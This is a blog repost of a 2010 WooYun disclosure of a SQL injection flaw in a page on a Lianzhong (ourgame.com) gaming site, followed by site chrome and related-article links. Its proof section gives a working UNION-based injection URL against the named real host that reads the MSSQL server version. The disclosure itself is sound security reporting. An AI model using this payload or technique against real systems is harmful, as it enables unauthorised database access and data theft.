联众世界某网站SQL注射漏洞

最新推荐文章于 2024-07-13 20:34:41 发布
最新推荐文章于 2024-07-13 20:34:41 发布
阅读量3.2k 收藏
点赞数
文章标签: web安全 网络安全 安全 hack wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124188507
版权

漏洞详情

披露状态:

2010-07-26: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-26: 细节向公众公开

简要描述:

联众世界某网站存在SQL注射漏洞,并支持UNION。

详细说明:

http://mgame.ourgame.com/user_look.aspx?ID=axyypy
存在SQL注射漏洞,支持UNION语句,因为MSSQL数据库,也可对其他库进行注射攻击。

漏洞证明:

http://mgame.ourgame.com/user_look.aspx?ID=axyypy%27%20union%20select%20@@version,%27b%27,%27c%27,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

修复方案:

过滤注入关键字

版权声明:转载请注明来源 Liscker@乌云

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
对伪静态网站实施注射
weixin_30487317的博客
06-16 50
伪静态网站注入方法,莱鸟扫盲来了哦,通常情况下,动态脚本的网站的url类似下面这样: http://www.91ri.org/news.php?id=111 做了伪静态之后就成这样了 http://www.91ri.org/news.php/id/111.html 以斜杠“/”代替了“=”并在最后加上.html,这样一来,就无法直接用工具来注入了, 现在我们就来讨论下如何用工具来注入,大...
记录一次对某网站sql注入
weixin_67503304的博客
09-16 3596
讲解了一次基本sql注入的实战讲解,针对某省某网站的实战测试,本测试仅用于演示。
网站SQL注入漏洞检测
热门推荐
huangbaokang的博客
04-02 1万+
针对网页get请求,在传入后台程序参数时,需要预防SQL注入漏洞漏洞检测 针对网址http://页面/….?id=113 1、先尝试在地址栏加个单引号,http://页面/....?id=113'看返回的页面是否有变化,如果有变化,说明这个网页可能存在漏洞 2、再尝试在地址栏后面加上and 1=1,http://页面/....?id=113 and 1=1看看页面有没有变化,如果显示正...
web漏洞SQL注入
Bin的博客
04-02 447
目录 一、概述 1.1什么是SQL注入 1.2原理 二、分类 2.1按照数据提交方式分类 2.2按照注入点类型来分类 2.3按照执行效果来分类 三、注入流程 四、验证方法 3.1数字型注入验证 3.2字符型注入验证 五、攻击方法 5.1猜解SQL查询语句中的字段数 5.2找回显点 5.3获取数据库名称 5.4查询表名 5.5查询字段 5.6查信息 六、防御方法...
联众世界游戏大厅2017Beta1官方安装版
07-30
联众游戏大厅是联众世界自主开发的一款集棋牌、休闲、对战于一体的游戏客户端, 用户可以通过游戏大厅迅速进入联众游戏世界,与来自世界各地的玩家同竞技,共欢乐。 更新内容: 1.美化游戏进入图标 2.修改了...
联众HIS4表结构.docx
08-11
联众his系统的表结构文档,包含所有表字段含义,版本是his4,不过his3也能用
联众电子病历表结构文档.doc
08-11
联众电子病历表结构文档》是浙江联众卫生信息科技有限公司提供的关于电子病历系统的主要表结构的详细说明,旨在帮助ZJHIS、EMR3、EMR及EMRJK等用户理解并有效地操作和管理电子病历数据。文档由占贵顺和葛向东两位...
联众识别HTTP_V2.1.ec
11-21
联众代答HTTP答题(联众_报错,联众_查询,联众_答题),系统核心支持库[krnln],通用对象支持库[commobj]
联众识别HTTP_V2.1.zip
04-15
模块中的“联众_报错”功能,用于向服务器报告游戏运行时遇到的错误。在软件开发中,错误处理是非常重要的一环,能够及时反馈问题,有助于开发者快速定位并修复错误,提高用户体验。通过调用这个功能,开发者可以将...
如何用IP地址申请SSL证书实现网络安全
2401_84891336的博客
07-10 404
申请IP地址SSL证书
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 1236
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
7.13实训日志
最新发布
Kidding_Ma的博客
07-13 189
作为一名大学生,我深感有责任在今后的学习和职业生涯中,为推动网络安全技术的发展和应用做出贡献,保障数字化社会的安全和稳定发展。在技术方面,我们学习了多种编程语言和工具的应用,如Python用于爬虫和脚本、Java用于代码审计和漏洞挖掘、C语言用于二进制漏洞挖掘等。会上,专家学者们分享了关于网络安全最新的研究成果和技术应用,以及面临的挑战和未来的发展方向,给我留下了深刻的印象和启发。学习网络安全的过程中,我们深入了解了网络的不同层面和技术,从表层网络到深网再到暗网,以及涉及的产业分类和技术工具。
网络安全——防御实验
Nirvana92的博客
07-09 1085
# 防御实验一 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/63794e616c244387a03fae34450d6f00.png) #### 拓扑结构展示: ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/eb297641443c4f78b6c93c432e2b5286.png) ## 一、 ### 根据题目,先为办公区做**安全策略**主要策略有以下几点: 1、书写名称和描述,名称和描述要**明确**,让除本人
网络安全法视角下的等保测评法律责任与风险控制
ddcajdkdl的博客
07-11 421
直接责任人员处罚:对于违反网络安全法规定,导致严重后果的,不仅单位要承担责任,直接负责的主管人员和其他直接责任人员也可能被处以罚款,甚至追究刑事责任。该法于2017年6月1日正式实施,其中对网络安全等级保护制度(简称“等保”)做出了明确规定,要求网络运营者根据其网络的重要程度及潜在影响,实施相应级别的安全保护措施。综上所述,从《网络安全法》的角度出发,等保测评不仅是法律规定的强制性要求,也是企业自我保护、规避法律风险、维护信誉和业务连续性的关键措施。
网络安全合规建设
weixin_68864415的博客
07-09 908
简单介绍了企业网络安全合规的问题
网络安全科普】网络安全指南请查收
weixin_45840241的博客
07-09 892
网络安全为人民、网络安全靠人民,维护网络安全是全社会共同的责任,需要政府、企业、社会组织、广大网民共同参与,共筑网络安全防线。但与此同时,互联网领域的问题也日益凸显。网络安全,是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性、真实性和可控性的能力。所有刷单都是诈骗,做任务赚佣金不过是刷单诈骗的诱饵,切勿相信“免费送、轻松赚”等兼职广告,不要贪图小便宜,不要轻易点击陌生链接或扫描陌生二维码下载APP。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-04 2035
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全威胁情报到底是什么
学-> 思->用
07-10 274
网络安全威胁情报是提升组织安全态势的重要手段,通过收集和分析各种威胁信息,组织可以更有效地预防、检测和响应网络攻击。威胁情报的构成要素包括指标、TTPs、威胁行为体、漏洞、恶意软件和攻击事件。通过合理应用威胁情报,组织可以增强防御能力、提升事件响应效率,并通过情报共享与合作,共同应对复杂多变的网络威胁。
联众识别http_v2.1
09-10
联众识别http_v2.1是联众公司推出的一种网络验证码识别技术版本。在网络应用程序中,为了防止机器人或自动程序对系统进行恶意攻击或滥用,通常会设置验证码,要求用户输入图片中的字符或进行其他人机识别验证。联众...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值